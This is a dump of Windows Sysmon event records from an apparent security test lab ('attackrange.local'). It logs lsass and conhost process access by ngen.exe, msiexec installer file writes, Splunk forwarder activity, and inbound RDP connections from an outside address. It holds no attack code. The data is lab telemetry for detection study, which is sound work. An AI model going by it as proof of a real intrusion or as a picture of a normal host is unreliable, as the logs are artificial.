14:57:24.014{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-900C-00000000BB01}944c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.014{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD3-607E-900C-00000000BB01}944c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.014{A7A01FEF-EBD3-607E-900C-00000000BB01}944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.999{A7A01FEF-EBD3-607E-910C-00000000BB01}49686184C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-900C-00000000BB01}944c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.999{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-910C-00000000BB01}4968C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x800000000000000050262Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:24.984{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE7523766F5BB4375D37D10702B4F6D1,SHA256=2847D51FFCEBBDB8B8D6E408E0FE7AC700C05A3CD4A295EE370E08807FF43079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050261Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:24.531{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=238D2AC3D9AC378B6EB9282723C594D3,SHA256=33E4C6C4DEE93B390CA128B0B585DB18A53C0EE64C81E8D30B51E2DF86300092,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050260Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:21.599{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54936-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000074469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.983{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d08292.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.952{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\inprogressinstallinfo.ipiMD5=C7EC29DEE811C57FB5ABB507384B43FB,SHA256=55AA2044D3A43A3D1F24CA322C948D82AE5A87A3EA3506A3E511D446719B91A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.952{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF91DF2C620AEEB745.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.952{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF064FED3EDF6AE20E.TMPMD5=C7EC29DEE811C57FB5ABB507384B43FB,SHA256=55AA2044D3A43A3D1F24CA322C948D82AE5A87A3EA3506A3E511D446719B91A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.936{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF2DBBE6286EE5FE27.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.936{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF9A3EF5E24EEEA949.TMPMD5=C7EC29DEE811C57FB5ABB507384B43FB,SHA256=55AA2044D3A43A3D1F24CA322C948D82AE5A87A3EA3506A3E511D446719B91A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.936{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d0828e.msiMD5=E20FBF0B3B3A743FF322CF09889E384F,SHA256=58B06E326B3EE4D5ABD578EAC08CDA92CE97F21AA7CE6CC77EA20CAF8B9777EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.936{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF055490FAE306BE21.TMPMD5=AD6E594B7ADEF191608F8811B10D2C1C,SHA256=1C2A5C271C641CE82D302429D80EEE85595CA422ED00C9F02D14AC644967DF12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.936{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFBB50D8D144830600.TMPMD5=06F56E37CED4F9372FE1A8039948EABD,SHA256=25FFCC59B999E07EC2A50658DC47F648268B5032BFCD85EBD37E05D4B356B1CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.921{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d08290.rbsMD5=196866B64A7439E88D873D4FF8EDDAE0,SHA256=C929E9C3C92958673F42C3B417121E6838D5B9B82B616502BC97B93156BBDB92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.921{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF1250846FC9E48CEB.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.921{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF35A7DE1CD3DBEF1E.TMPMD5=F52CA6B3E730BFAAFA4F92C10EA84162,SHA256=66C1B9722422ADDFCD8D53C5B6270563AB31C8A7669FE06F4849F1972DE7F7BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.921{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF8786A6E22C5E0821.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.921{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF9F06991DE1BCD0EC.TMPMD5=F52CA6B3E730BFAAFA4F92C10EA84162,SHA256=66C1B9722422ADDFCD8D53C5B6270563AB31C8A7669FE06F4849F1972DE7F7BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.905{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSID56E.tmpMD5=73646E2CC6C965FB6CDB09A7C5E97681,SHA256=8D6A6F3C66826FC9EDA72C8C47754F2C6E85CDC99143119D26B92819874EE23E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000074454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:25.905{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\URLUpdateInfo(Empty) 13241300x800000000000000074453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:57:25.905{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\PublisherMicrosoft Corporation 13241300x800000000000000074452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:57:25.905{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\InstallSourcec:\program files\microsoft office\root\integration\ 23542300x800000000000000074451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.889{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d08290.rbsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.889{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF3E6F1BB19BCDB1FD.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.889{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF738D29E8F9C9FC58.TMPMD5=F52CA6B3E730BFAAFA4F92C10EA84162,SHA256=66C1B9722422ADDFCD8D53C5B6270563AB31C8A7669FE06F4849F1972DE7F7BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.858{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSID56E.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000074447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.608{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-25736-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000074446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.608{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-23008-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000074445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.811{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14002064C:\Windows\system32\msiexec.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19dedd|C:\Windows\system32\Msi.dll+2ea6e|C:\Windows\system32\Msi.dll+474c5|C:\Windows\system32\Msi.dll+10a3b5|C:\Windows\system32\Msi.dll+1095d6|C:\Windows\system32\Msi.dll+f3bef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.796{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d0828e.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.780{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\inprogressinstallinfo.ipiMD5=64661EE6A41383D44DE7BDB7988A1E78,SHA256=DB55522F37C87A9FBD2EC19798C21618AC7A6CDE8C420A7F375DF4E6FAE62B7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.780{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF42008250024CAAF3.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.780{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF7953EA958380557C.TMPMD5=64661EE6A41383D44DE7BDB7988A1E78,SHA256=DB55522F37C87A9FBD2EC19798C21618AC7A6CDE8C420A7F375DF4E6FAE62B7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.780{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF4DA40B10595BDF0D.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000074439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.780{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF5ECF102B74B42FB4.TMPMD5=64661EE6A41383D44DE7BDB7988A1E78,SHA256=DB55522F37C87A9FBD2EC19798C21618AC7A6CDE8C420A7F375DF4E6FAE62B7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.780{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\d0828a.msiMD5=48C6BB846D0E859DC7795CFB7E7B387D,SHA256=C689BD3ADAFE767C6C61C56DA5D6F8FA0971EC0DF8BD7A669655C12DBBA5B19F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.686{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFBCAEAFF602DD785E.TMPMD5=69C1D86351A799A020B676747400041D,SHA256=FB011E734823D05BEABCE18AE2FC838463A57BFD555307D001C1B2C015AB490A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.686{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFF9BFA72D51CA53E5.TMPMD5=9A892E92C03F738E02419A424F58A3B3,SHA256=D63F498BB967731C511BB05504E4123C7AF44A722630461532759FBBAFB3E989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.671{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d0828c.rbsMD5=2883C865DC7F1D7458E0B9007AA7DCF6,SHA256=3E6E1D0FF5498AB1439D0F4188E1D776F754A543F8F352102137089B3C129522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.639{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSIBB7C.tmpMD5=FCCDC45CA17E5180B40EFC28052BAC39,SHA256=4AB37B0F9C5FE3505E1ECFE0764AAA04838CF81F9E0A402425E057F7A251E621,IMPHASH=620AD7AB8901854C91622E052544AEE7truetrue 23542300x800000000000000074433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.624{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=98A784D0C9FCBD707BABE150BCE2D04A,SHA256=D57CDA343A2D49ECF1F1780B4F237C47E41005DECDFC2CDB58384700EF771E87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.624{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F077AB4925C50B99D92CD9758BD2331C,SHA256=28E7621BAF8961BD89EBF90204E030F3257DAA201193A4A38A8B536FB819333A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.374{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD5-607E-B40C-00000000BB01}5324c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.374{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD5-607E-B40C-00000000BB01}5324c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.374{A7A01FEF-EBD5-607E-B40C-00000000BB01}5324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.186{A7A01FEF-EBD5-607E-B50C-00000000BB01}21767112C:\Windows\system32\conhost.exe{A7A01FEF-EBD5-607E-B40C-00000000BB01}5324c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:25.171{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD5-607E-B50C-00000000BB01}2176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 